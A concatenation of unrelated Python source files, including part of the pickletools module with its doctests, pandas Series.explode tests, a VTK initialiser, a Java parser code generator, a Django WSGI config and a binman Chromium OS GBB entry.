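# This walks the pickle one opcode at a time and stops after STOP.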
def optimize(p):
'Optimize a pickle string by removing unused PUT opcodes'
put = 'PUT'
get = 'GET'
oldids = set() # set of all PUT ids
newids = {} # maps ids used by a GET opcode to their new indices
opcodes = [] # (op, idx) or (pos, end_pos)
proto = 0
protoheader = b''
for opcode, arg, pos, end_pos in _genops(p, yield_end_pos=True):
if 'PUT' in opcode.name:
oldids.add(arg)
opcodes.append((put, arg))
elif opcode.name == 'MEMOIZE':
idx = len(oldids)
oldids.add(idx)
opcodes.append((put, idx))
elif 'FRAME' in opcode.name:
pass
elif 'GET' in opcode.name:
if opcode.proto > proto:
proto = opcode.proto
newids[arg] = None
opcodes.append((get, arg))
elif opcode.name == 'PROTO':
if arg > proto:
proto = arg
if pos == 0:
protoheader = p[pos: end_pos]
else:
opcodes.append((pos, end_pos))
else:
opcodes.append((pos, end_pos))
del oldids
# Copy the opcodes except for PUTS without a corresponding GET
out = io.BytesIO()
# Write the PROTO header before any framing
out.write(protoheader)
pickler = pickle._Pickler(out, proto)
if proto >= 4:
pickler.framer.start_framing()
idx = 0
for op, arg in opcodes:
if op is put:
if arg not in newids:
continue
data = pickler.put(idx)
newids[arg] = idx
idx += 1
elif op is get:
data = pickler.get(newids[arg])
else:
data = p[op:arg]
pickler.framer.commit_frame()
pickler.write(data)
pickler.framer.end_framing()
return out.getvalue()
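# A quick sketch of optimize() (illustrative): even without shared
# references, a protocol-2 pickle carries PUT opcodes that no GET ever
# references; optimize() drops them while preserving the unpickled value:
#
#     import pickle
#     p = pickle.dumps([1, 2, 3], 2)
#     shorter = optimize(p)
#     assert pickle.loads(shorter) == [1, 2, 3]
#     assert len(shorter) <= len(p)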
def dis(pickle, out=None, memo=None, indentlevel=4, annotate=0):
"""Produce a symbolic disassembly of a pickle.
'pickle' is a file-like object, or string, containing at least one
pickle. The pickle is disassembled from the current position, through
the first STOP opcode encountered.
Optional arg 'out' is a file-like object to which the disassembly is
printed. It defaults to sys.stdout.
Optional arg 'memo' is a Python dict, used as the pickle's memo. It
may be mutated by dis(), if the pickle contains PUT or BINPUT opcodes.
Passing the same memo object to another dis() call then allows disassembly
to proceed across multiple pickles that were all created by the same
pickler with the same memo. Ordinarily you don't need to worry about this.
Optional arg 'indentlevel' is the number of blanks by which to indent
a new MARK level. It defaults to 4.
Optional arg 'annotate' if nonzero instructs dis() to add short
description of the opcode on each line of disassembled output.
The value given to 'annotate' must be an integer and is used as a
hint for the column where annotation should start. The default
value is 0, meaning no annotations.
In addition to printing the disassembly, some sanity checks are made:
+ All embedded opcode arguments "make sense".
+ Explicit and implicit pop operations have enough items on the stack.
+ When an opcode implicitly refers to a markobject, a markobject is
actually on the stack.
+ A memo entry isn't referenced before it's defined.
+ The markobject isn't stored in the memo.
+ A memo entry isn't redefined.
"""
# Most of the hair here is for sanity checks, but most of it is needed
# anyway to detect when a protocol 0 POP takes a MARK off the stack
# (which in turn is needed to indent MARK blocks correctly).
stack = [] # crude emulation of unpickler stack
if memo is None:
memo = {} # crude emulation of unpickler memo
maxproto = -1 # max protocol number seen
markstack = [] # bytecode positions of MARK opcodes
indentchunk = ' ' * indentlevel
errormsg = None
annocol = annotate # column hint for annotations
for opcode, arg, pos in genops(pickle):
if pos is not None:
print("%5d:" % pos, end=' ', file=out)
line = "%-4s %s%s" % (repr(opcode.code)[1:-1],
indentchunk * len(markstack),
opcode.name)
maxproto = max(maxproto, opcode.proto)
before = opcode.stack_before # don't mutate
after = opcode.stack_after # don't mutate
numtopop = len(before)
# See whether a MARK should be popped.
markmsg = None
if markobject in before or (opcode.name == "POP" and
stack and
stack[-1] is markobject):
assert markobject not in after
if __debug__:
if markobject in before:
assert before[-1] is stackslice
if markstack:
markpos = markstack.pop()
if markpos is None:
markmsg = "(MARK at unknown opcode offset)"
else:
markmsg = "(MARK at %d)" % markpos
# Pop everything at and after the topmost markobject.
while stack[-1] is not markobject:
stack.pop()
stack.pop()
# Stop later code from popping too much.
try:
numtopop = before.index(markobject)
except ValueError:
assert opcode.name == "POP"
numtopop = 0
else:
errormsg = markmsg = "no MARK exists on stack"
# Check for correct memo usage.
if opcode.name in ("PUT", "BINPUT", "LONG_BINPUT", "MEMOIZE"):
if opcode.name == "MEMOIZE":
memo_idx = len(memo)
markmsg = "(as %d)" % memo_idx
else:
assert arg is not None
memo_idx = arg
if memo_idx in memo:
errormsg = "memo key %r already defined" % arg
elif not stack:
errormsg = "stack is empty -- can't store into memo"
elif stack[-1] is markobject:
errormsg = "can't store markobject in the memo"
else:
memo[memo_idx] = stack[-1]
elif opcode.name in ("GET", "BINGET", "LONG_BINGET"):
if arg in memo:
assert len(after) == 1
after = [memo[arg]] # for better stack emulation
else:
errormsg = "memo key %r has never been stored into" % arg
if arg is not None or markmsg:
# make a mild effort to align arguments
line += ' ' * (10 - len(opcode.name))
if arg is not None:
line += ' ' + repr(arg)
if markmsg:
line += ' ' + markmsg
if annotate:
line += ' ' * (annocol - len(line))
# make a mild effort to align annotations
annocol = len(line)
if annocol > 50:
annocol = annotate
line += ' ' + opcode.doc.split('\n', 1)[0]
print(line, file=out)
if errormsg:
# Note that we delayed complaining until the offending opcode
# was printed.
raise ValueError(errormsg)
# Emulate the stack effects.
if len(stack) < numtopop:
raise ValueError("tries to pop %d items from stack with "
"only %d items" % (numtopop, len(stack)))
if numtopop:
del stack[-numtopop:]
if markobject in after:
assert markobject not in before
markstack.append(pos)
stack.extend(after)
print("highest protocol among opcodes =", maxproto, file=out)
if stack:
raise ValueError("stack not empty after STOP: %r" % stack)
class _Example:
def __init__(self, value):
self.value = value
_dis_test = r"""
>>> import pickle
>>> x = [1, 2, (3, 4), {b'abc': "def"}]
>>> pkl0 = pickle.dumps(x, 0)
>>> dis(pkl0)
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 1
9: a APPEND
10: L LONG 2
14: a APPEND
15: ( MARK
16: L LONG 3
20: L LONG 4
24: t TUPLE (MARK at 15)
25: p PUT 1
28: a APPEND
29: ( MARK
30: d DICT (MARK at 29)
31: p PUT 2
34: c GLOBAL '_codecs encode'
50: p PUT 3
53: ( MARK
54: V UNICODE 'abc'
59: p PUT 4
62: V UNICODE 'latin1'
70: p PUT 5
73: t TUPLE (MARK at 53)
74: p PUT 6
77: R REDUCE
78: p PUT 7
81: V UNICODE 'def'
86: p PUT 8
89: s SETITEM
90: a APPEND
91: . STOP
highest protocol among opcodes = 0
Try again with a "binary" pickle.
>>> pkl1 = pickle.dumps(x, 1)
>>> dis(pkl1)
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 1
6: K BININT1 2
8: ( MARK
9: K BININT1 3
11: K BININT1 4
13: t TUPLE (MARK at 8)
14: q BINPUT 1
16: } EMPTY_DICT
17: q BINPUT 2
19: c GLOBAL '_codecs encode'
35: q BINPUT 3
37: ( MARK
38: X BINUNICODE 'abc'
46: q BINPUT 4
48: X BINUNICODE 'latin1'
59: q BINPUT 5
61: t TUPLE (MARK at 37)
62: q BINPUT 6
64: R REDUCE
65: q BINPUT 7
67: X BINUNICODE 'def'
75: q BINPUT 8
77: s SETITEM
78: e APPENDS (MARK at 3)
79: . STOP
highest protocol among opcodes = 1
Exercise the INST/OBJ/BUILD family.
>>> import pickletools
>>> dis(pickle.dumps(pickletools.dis, 0))
0: c GLOBAL 'pickletools dis'
17: p PUT 0
20: . STOP
highest protocol among opcodes = 0
>>> from pickletools import _Example
>>> x = [_Example(42)] * 2
>>> dis(pickle.dumps(x, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: c GLOBAL 'copy_reg _reconstructor'
30: p PUT 1
33: ( MARK
34: c GLOBAL 'pickletools _Example'
56: p PUT 2
59: c GLOBAL '__builtin__ object'
79: p PUT 3
82: N NONE
83: t TUPLE (MARK at 33)
84: p PUT 4
87: R REDUCE
88: p PUT 5
91: ( MARK
92: d DICT (MARK at 91)
93: p PUT 6
96: V UNICODE 'value'
103: p PUT 7
106: L LONG 42
111: s SETITEM
112: b BUILD
113: a APPEND
114: g GET 5
117: a APPEND
118: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(x, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: c GLOBAL 'copy_reg _reconstructor'
29: q BINPUT 1
31: ( MARK
32: c GLOBAL 'pickletools _Example'
54: q BINPUT 2
56: c GLOBAL '__builtin__ object'
76: q BINPUT 3
78: N NONE
79: t TUPLE (MARK at 31)
80: q BINPUT 4
82: R REDUCE
83: q BINPUT 5
85: } EMPTY_DICT
86: q BINPUT 6
88: X BINUNICODE 'value'
98: q BINPUT 7
100: K BININT1 42
102: s SETITEM
103: b BUILD
104: h BINGET 5
106: e APPENDS (MARK at 3)
107: . STOP
highest protocol among opcodes = 1
Try "the canonical" recursive-object test.
>>> L = []
>>> T = L,
>>> L.append(T)
>>> L[0] is T
True
>>> T[0] is L
True
>>> L[0][0] is L
True
>>> T[0][0] is T
True
>>> dis(pickle.dumps(L, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: ( MARK
6: g GET 0
9: t TUPLE (MARK at 5)
10: p PUT 1
13: a APPEND
14: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(L, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: h BINGET 0
6: t TUPLE (MARK at 3)
7: q BINPUT 1
9: a APPEND
10: . STOP
highest protocol among opcodes = 1
Note that, in the protocol 0 pickle of the recursive tuple, the disassembler
has to emulate the stack in order to realize that the POP opcode at 16 gets
rid of the MARK at 0.
>>> dis(pickle.dumps(T, 0))
0: ( MARK
1: ( MARK
2: l LIST (MARK at 1)
3: p PUT 0
6: ( MARK
7: g GET 0
10: t TUPLE (MARK at 6)
11: p PUT 1
14: a APPEND
15: 0 POP
16: 0 POP (MARK at 0)
17: g GET 1
20: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(T, 1))
0: ( MARK
1: ] EMPTY_LIST
2: q BINPUT 0
4: ( MARK
5: h BINGET 0
7: t TUPLE (MARK at 4)
8: q BINPUT 1
10: a APPEND
11: 1 POP_MARK (MARK at 0)
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 1
Try protocol 2.
>>> dis(pickle.dumps(L, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: . STOP
highest protocol among opcodes = 2
>>> dis(pickle.dumps(T, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: 0 POP
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 2
Try protocol 3 with annotations:
>>> dis(pickle.dumps(T, 3), annotate=1)
0: \x80 PROTO 3 Protocol version indicator.
2: ] EMPTY_LIST Push an empty list.
3: q BINPUT 0 Store the stack top into the memo. The stack is not popped.
5: h BINGET 0 Read an object from the memo and push it on the stack.
7: \x85 TUPLE1 Build a one-tuple out of the topmost item on the stack.
8: q BINPUT 1 Store the stack top into the memo. The stack is not popped.
10: a APPEND Append an object to a list.
11: 0 POP Discard the top stack item, shrinking the stack by one item.
12: h BINGET 1 Read an object from the memo and push it on the stack.
14: . STOP Stop the unpickling machine.
highest protocol among opcodes = 2
"""
_memo_test = r"""
>>> import pickle
>>> import io
>>> f = io.BytesIO()
>>> p = pickle.Pickler(f, 2)
>>> x = [1, 2, 3]
>>> p.dump(x)
>>> p.dump(x)
>>> f.seek(0)
0
>>> memo = {}
>>> dis(f, memo=memo)
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 1
8: K BININT1 2
10: K BININT1 3
12: e APPENDS (MARK at 5)
13: . STOP
highest protocol among opcodes = 2
>>> dis(f, memo=memo)
14: \x80 PROTO 2
16: h BINGET 0
18: . STOP
highest protocol among opcodes = 2
"""
__test__ = {'disassembler_test': _dis_test,
'disassembler_memo_test': _memo_test,
}
def _test():
import doctest
return doctest.testmod()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='disassemble one or more pickle files')
parser.add_argument(
'pickle_file', type=argparse.FileType('br'),
nargs='*', help='the pickle file')
parser.add_argument(
'-o', '--output', default=sys.stdout, type=argparse.FileType('w'),
help='the file where the output should be written')
parser.add_argument(
'-m', '--memo', action='store_true',
help='preserve memo between disassemblies')
parser.add_argument(
'-l', '--indentlevel', default=4, type=int,
help='the number of blanks by which to indent a new MARK level')
parser.add_argument(
'-a', '--annotate', action='store_true',
help='annotate each line with a short opcode description')
parser.add_argument(
'-p', '--preamble', default="==> {name} <==",
help='if more than one pickle file is specified, print this before'
' each disassembly')
parser.add_argument(
'-t', '--test', action='store_true',
help='run self-test suite')
parser.add_argument(
'-v', action='store_true',
help='run verbosely; only affects self-test run')
args = parser.parse_args()
if args.test:
_test()
else:
annotate = 30 if args.annotate else 0
if not args.pickle_file:
parser.print_help()
elif len(args.pickle_file) == 1:
dis(args.pickle_file[0], args.output, None,
args.indentlevel, annotate)
else:
memo = {} if args.memo else None
for f in args.pickle_file:
preamble = args.preamble.format(name=f.name)
args.output.write(preamble + '\n')
dis(f, args.output, memo, args.indentlevel, annotate)
|
import numpy as np
import pytest
import pandas as pd
import pandas._testing as tm
def test_basic():
s = pd.Series([[0, 1, 2], np.nan, [], (3, 4)], index=list("abcd"), name="foo")
result = s.explode()
expected = pd.Series(
[0, 1, 2, np.nan, np.nan, 3, 4], index=list("aaabcdd"), dtype=object, name="foo"
)
tm.assert_series_equal(result, expected)
def test_mixed_type():
s = pd.Series(
[[0, 1, 2], np.nan, None, np.array([]), pd.Series(["a", "b"])], name="foo"
)
result = s.explode()
expected = pd.Series(
[0, 1, 2, np.nan, None, np.nan, "a", "b"],
index=[0, 0, 0, 1, 2, 3, 4, 4],
dtype=object,
name="foo",
)
tm.assert_series_equal(result, expected)
def test_empty():
s = pd.Series(dtype=object)
result = s.explode()
expected = s.copy()
tm.assert_series_equal(result, expected)
def test_nested_lists():
s = pd.Series([[[1, 2, 3]], [1, 2], 1])
result = s.explode()
expected = pd.Series([[1, 2, 3], 1, 2, 1], index=[0, 1, 1, 2])
tm.assert_series_equal(result, expected)
def test_multi_index():
s = pd.Series(
[[0, 1, 2], np.nan, [], (3, 4)],
name="foo",
index=pd.MultiIndex.from_product([list("ab"), range(2)], names=["foo", "bar"]),
)
result = s.explode()
index = pd.MultiIndex.from_tuples(
[("a", 0), ("a", 0), ("a", 0), ("a", 1), ("b", 0), ("b", 1), ("b", 1)],
names=["foo", "bar"],
)
expected = pd.Series(
[0, 1, 2, np.nan, np.nan, 3, 4], index=index, dtype=object, name="foo"
)
tm.assert_series_equal(result, expected)
def test_large():
s = pd.Series([range(256)]).explode()
result = s.explode()
tm.assert_series_equal(result, s)
def test_invert_array():
df = pd.DataFrame({"a": pd.date_range("20190101", periods=3, tz="UTC")})
listify = df.apply(lambda x: x.array, axis=1)
result = listify.explode()
tm.assert_series_equal(result, df["a"].rename())
@pytest.mark.parametrize(
"s", [pd.Series([1, 2, 3]), pd.Series(pd.date_range("2019", periods=3, tz="UTC"))]
)
def test_non_object_dtype(s):
result = s.explode()
tm.assert_series_equal(result, s)
def test_typical_usecase():
df = pd.DataFrame(
[{"var1": "a,b,c", "var2": 1}, {"var1": "d,e,f", "var2": 2}],
columns=["var1", "var2"],
)
exploded = df.var1.str.split(",").explode()
result = df[["var2"]].join(exploded)
expected = pd.DataFrame(
{"var2": [1, 1, 1, 2, 2, 2], "var1": list("abcdef")},
columns=["var2", "var1"],
index=[0, 0, 0, 1, 1, 1],
)
tm.assert_frame_equal(result, expected)
def test_nested_EA():
# a nested EA array
s = pd.Series(
[
pd.date_range("20170101", periods=3, tz="UTC"),
pd.date_range("20170104", periods=3, tz="UTC"),
]
)
result = s.explode()
expected = pd.Series(
pd.date_range("20170101", periods=6, tz="UTC"), index=[0, 0, 0, 1, 1, 1]
)
tm.assert_series_equal(result, expected)
def test_duplicate_index():
# GH 28005
s = pd.Series([[1, 2], [3, 4]], index=[0, 0])
result = s.explode()
expected = pd.Series([1, 2, 3, 4], index=[0, 0, 0, 0], dtype=object)
tm.assert_series_equal(result, expected)
def test_ignore_index():
# GH 34932
s = pd.Series([[1, 2], [3, 4]])
result = s.explode(ignore_index=True)
expected = pd.Series([1, 2, 3, 4], index=[0, 1, 2, 3], dtype=object)
tm.assert_series_equal(result, expected)
def test_explode_sets():
# https://github.com/pandas-dev/pandas/issues/35614
s = pd.Series([{"a", "b", "c"}], index=[1])
result = s.explode().sort_values()
expected = pd.Series(["a", "b", "c"], index=[1, 1, 1])
tm.assert_series_equal(result, expected)
def test_explode_scalars_can_ignore_index():
# https://github.com/pandas-dev/pandas/issues/40487
s = pd.Series([1, 2, 3], index=["a", "b", "c"])
result = s.explode(ignore_index=True)
expected = pd.Series([1, 2, 3])
tm.assert_series_equal(result, expected)
|
"""vtk_kit package driver file.
This performs all initialisation necessary to use VTK from DeVIDE. Makes
sure that all VTK classes have ErrorEvent handlers that report back to
the ModuleManager.
Inserts the following modules in sys.modules: vtk, vtkdevide.
@author: Charl P. Botha <http://cpbotha.net/>
"""
import re
import sys
import traceback
import types
VERSION = ''
def preImportVTK(progressMethod):
vtkImportList = [('vtk.common', 'VTK Common.'),
('vtk.filtering', 'VTK Filtering.'),
('vtk.io', 'VTK IO.'),
('vtk.imaging', 'VTK Imaging.'),
('vtk.graphics', 'VTK Graphics.'),
('vtk.rendering', 'VTK Rendering.'),
('vtk.hybrid', 'VTK Hybrid.'),
#('vtk.patented', 'VTK Patented.'),
('vtk', 'Other VTK symbols')]
# set the dynamic loading flags. If we don't do this, we get strange
# errors on 64 bit machines. To see this happen, comment this statement
# and then run the VTK->ITK connection test case.
oldflags = setDLFlags()
percentStep = 100.0 / len(vtkImportList)
currentPercent = 0.0
# do the imports
for module, message in vtkImportList:
currentPercent += percentStep
progressMethod(currentPercent, 'Initialising vtk_kit: %s' % (message,),
noTime=True)
exec('import %s' % (module,))
# restore previous dynamic loading flags
resetDLFlags(oldflags)
def setDLFlags():
# brought over from ITK Wrapping/CSwig/Python
# Python "help(sys.setdlopenflags)" states:
#
# setdlopenflags(...)
# setdlopenflags(n) -> None
#
# Set the flags that will be used for dlopen() calls. Among other
# things, this will enable a lazy resolving of symbols when
# importing a module, if called as sys.setdlopenflags(0) To share
# symbols across extension modules, call as
#
# sys.setdlopenflags(dl.RTLD_NOW|dl.RTLD_GLOBAL)
#
# GCC 3.x depends on proper merging of symbols for RTTI:
# http://gcc.gnu.org/faq.html#dso
#
try:
import dl
newflags = dl.RTLD_NOW|dl.RTLD_GLOBAL
except ImportError:
newflags = 0x102 # No dl module, so guess (see above).
try:
oldflags = sys.getdlopenflags()
sys.setdlopenflags(newflags)
except AttributeError:
oldflags = None
return oldflags
def resetDLFlags(data):
# brought over from ITK Wrapping/CSwig/Python
# Restore the original dlopen flags.
try:
sys.setdlopenflags(data)
except (AttributeError, TypeError):
pass # no dlopen flags on this platform, or setDLFlags() saved None
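# Typical pairing of the two helpers above (a sketch; preImportVTK() does
# effectively this around its imports):
#
#     oldflags = setDLFlags()
#     import vtk
#     resetDLFlags(oldflags)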
def init(module_manager, pre_import=True):
# first do the VTK pre-imports: this is here ONLY to keep the user happy
# it's not necessary for normal functioning
if pre_import:
preImportVTK(module_manager.setProgress)
# import the main module itself
# the global is so that users can also do:
# from module_kits import vtk_kit
# vtk_kit.vtk.vtkSomeFilter()
global vtk
import vtk
# and do the same for vtkdevide
global vtkdevide
import vtkdevide
# load up some generic functions into this namespace
# user can, after import of module_kits.vtk_kit, address these as
# module_kits.vtk_kit.blaat. In this case we don't need "global",
# as these are modules directly in this package.
import module_kits.vtk_kit.misc as misc
import module_kits.vtk_kit.mixins as mixins
import module_kits.vtk_kit.utils as utils
import module_kits.vtk_kit.constants as constants
import module_kits.vtk_kit.color_scales as color_scales
# setup the kit version
global VERSION
VERSION = '%s' % (vtk.vtkVersion.GetVTKVersion(),)
|
import datetime
import sys
import textwrap
import common
from xml.dom import pulldom
PARSER = """\
/**
* Copyright 2009 Joe LaPenna
*/
package com.joelapenna.foursquare.parsers;
import com.joelapenna.foursquare.Foursquare;
import com.joelapenna.foursquare.error.FoursquareError;
import com.joelapenna.foursquare.error.FoursquareParseException;
import com.joelapenna.foursquare.types.%(type_name)s;
import org.xmlpull.v1.XmlPullParser;
import org.xmlpull.v1.XmlPullParserException;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
/**
* Auto-generated: %(timestamp)s
*
* @author Joe LaPenna (joe@joelapenna.com)
* @param <T>
*/
public class %(type_name)sParser extends AbstractParser<%(type_name)s> {
private static final Logger LOG = Logger.getLogger(%(type_name)sParser.class.getCanonicalName());
private static final boolean DEBUG = Foursquare.PARSER_DEBUG;
@Override
public %(type_name)s parseInner(XmlPullParser parser) throws XmlPullParserException, IOException,
FoursquareError, FoursquareParseException {
parser.require(XmlPullParser.START_TAG, null, null);
%(type_name)s %(top_node_name)s = new %(type_name)s();
while (parser.nextTag() == XmlPullParser.START_TAG) {
String name = parser.getName();
%(stanzas)s
} else {
// Consume something we don't understand.
if (DEBUG) LOG.log(Level.FINE, "Found tag that we don't recognize: " + name);
skipSubTree(parser);
}
}
return %(top_node_name)s;
}
}"""
BOOLEAN_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(Boolean.valueOf(parser.nextText()));
"""
GROUP_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new GroupParser(new %(sub_parser_camel_case)s()).parse(parser));
"""
COMPLEX_STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(new %(parser_name)s().parse(parser));
"""
STANZA = """\
} else if ("%(name)s".equals(name)) {
%(top_node_name)s.set%(camel_name)s(parser.nextText());
"""
def main():
type_name, top_node_name, attributes = common.WalkNodesForAttributes(
sys.argv[1])
GenerateClass(type_name, top_node_name, attributes)
def GenerateClass(type_name, top_node_name, attributes):
"""generate it.
type_name: the type of object the parser returns
top_node_name: the name of the object the parser returns.
per common.WalkNodsForAttributes
"""
stanzas = []
for name in sorted(attributes):
typ, children = attributes[name]
replacements = Replacements(top_node_name, name, typ, children)
if typ == common.BOOLEAN:
stanzas.append(BOOLEAN_STANZA % replacements)
elif typ == common.GROUP:
stanzas.append(GROUP_STANZA % replacements)
elif typ in common.COMPLEX:
stanzas.append(COMPLEX_STANZA % replacements)
else:
stanzas.append(STANZA % replacements)
if stanzas:
# pop off the extraneous "} else " from the first conditional stanza.
stanzas[0] = stanzas[0].replace('} else ', '', 1)
replacements = Replacements(top_node_name, name, typ, [None])
replacements['stanzas'] = '\n'.join(stanzas).strip()
print PARSER % replacements
def Replacements(top_node_name, name, typ, children):
# CamelCaseClassName
type_name = ''.join([word.capitalize() for word in top_node_name.split('_')])
# CamelCaseClassName
camel_name = ''.join([word.capitalize() for word in name.split('_')])
# camelCaseLocalName
attribute_name = camel_name[0].lower() + camel_name[1:]
# mFieldName
field_name = 'm' + camel_name
if children[0]:
sub_parser_camel_case = children[0] + 'Parser'
else:
sub_parser_camel_case = (camel_name[:-1] + 'Parser')
return {
'type_name': type_name,
'name': name,
'top_node_name': top_node_name,
'camel_name': camel_name,
'parser_name': typ + 'Parser',
'attribute_name': attribute_name,
'field_name': field_name,
'typ': typ,
'timestamp': datetime.datetime.now(),
'sub_parser_camel_case': sub_parser_camel_case,
'sub_type': children[0]
}
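# Illustrative sketch of the naming scheme (names assumed, not from a real
# schema): for name='groups', Replacements() yields camel_name='Groups' and
# field_name='mGroups'; with no child type given, sub_parser_camel_case falls
# back to camel_name[:-1] + 'Parser' == 'GroupParser', stripping the plural 's'.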
if __name__ == '__main__':
main()
|
"""
WSGI config for made_with_twd_project project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "made_with_twd_project.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
import account
|
from collections import OrderedDict
from patman import command
from binman.entry import Entry, EntryArg
from dtoc import fdt_util
from patman import tools
gbb_flag_properties = {
'dev-screen-short-delay': 0x1,
'load-option-roms': 0x2,
'enable-alternate-os': 0x4,
'force-dev-switch-on': 0x8,
'force-dev-boot-usb': 0x10,
'disable-fw-rollback-check': 0x20,
'enter-triggers-tonorm': 0x40,
'force-dev-boot-legacy': 0x80,
'faft-key-override': 0x100,
'disable-ec-software-sync': 0x200,
'default-dev-boot-legacy': 0x400,
'disable-pd-software-sync': 0x800,
'disable-lid-shutdown': 0x1000,
'force-dev-boot-fastboot-full-cap': 0x2000,
'enable-serial': 0x4000,
'disable-dwmp': 0x8000,
}
class Entry_gbb(Entry):
"""An entry which contains a Chromium OS Google Binary Block
Properties / Entry arguments:
- hardware-id: Hardware ID to use for this build (a string)
- keydir: Directory containing the public keys to use
- bmpblk: Filename containing images used by recovery
Chromium OS uses a GBB to store various pieces of information, in particular
the root and recovery keys that are used to verify the boot process. Some
more details are here:
https://www.chromium.org/chromium-os/firmware-porting-guide/2-concepts
but note that the page dates from 2013 so is quite out of date. See
README.chromium for how to obtain the required keys and tools.
"""
def __init__(self, section, etype, node):
super().__init__(section, etype, node)
self.hardware_id, self.keydir, self.bmpblk = self.GetEntryArgsOrProps(
[EntryArg('hardware-id', str),
EntryArg('keydir', str),
EntryArg('bmpblk', str)])
# Read in the GBB flags from the config
self.gbb_flags = 0
flags_node = node.FindNode('flags')
if flags_node:
for flag, value in gbb_flag_properties.items():
if fdt_util.GetBool(flags_node, flag):
self.gbb_flags |= value
def ObtainContents(self):
gbb = 'gbb.bin'
fname = tools.GetOutputFilename(gbb)
if not self.size:
self.Raise('GBB must have a fixed size')
gbb_size = self.size
bmpfv_size = gbb_size - 0x2180
if bmpfv_size < 0:
self.Raise('GBB is too small (minimum 0x2180 bytes)')
sizes = [0x100, 0x1000, bmpfv_size, 0x1000]
sizes = ['%#x' % size for size in sizes]
keydir = tools.GetInputFilename(self.keydir)
gbb_set_command = [
'gbb_utility', '-s',
'--hwid=%s' % self.hardware_id,
'--rootkey=%s/root_key.vbpubk' % keydir,
'--recoverykey=%s/recovery_key.vbpubk' % keydir,
'--flags=%d' % self.gbb_flags,
'--bmpfv=%s' % tools.GetInputFilename(self.bmpblk),
fname]
tools.Run('futility', 'gbb_utility', '-c', ','.join(sizes), fname)
tools.Run('futility', *gbb_set_command)
self.SetContents(tools.ReadFile(fname))
return True
|